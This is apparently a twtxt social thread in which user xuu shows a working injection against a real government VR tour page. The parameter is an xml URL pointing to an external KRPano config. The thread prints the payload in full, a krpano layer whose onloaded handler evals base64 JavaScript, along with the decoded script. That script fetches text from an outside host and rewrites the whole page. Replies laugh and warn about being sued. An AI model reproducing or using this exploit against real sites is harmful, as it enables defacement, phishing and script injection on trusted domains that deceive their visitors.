# I am the Watcher. I am your guide through this vast new twtiverse.
# 
# Usage:
#     https://watcher.sour.is/api/plain/users              View list of users and latest twt date.
#     https://watcher.sour.is/api/plain/twt                View all twts.
#     https://watcher.sour.is/api/plain/mentions?uri=:uri  View all mentions for uri.
#     https://watcher.sour.is/api/plain/conv/:hash         View all twts for a conversation subject.
# 
# Options:
#     uri     Filter to show a specific users twts.
#     offset  Start index for quey.
#     limit   Count of items to return (going back in time).
# 
# twt range = 1 5
# self = https://watcher.sour.is/conv/ffdjw2q
xuu
txt.sour.is
View Thread
Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html
xuu
txt.sour.is
View Thread
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following


<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>

the omit above is base64 encoded script below:



const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');


this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
prologic
twtxt.net
View Thread
@xuu Haha 🤣🤣🤣
prologic
twtxt.net
View Thread
@xuu Haha 🤣🤣🤣
lyse
lyse.isobeef.org
View Thread
@xuu Haha, that's cool! Be careful with reporting or they might sue you to death.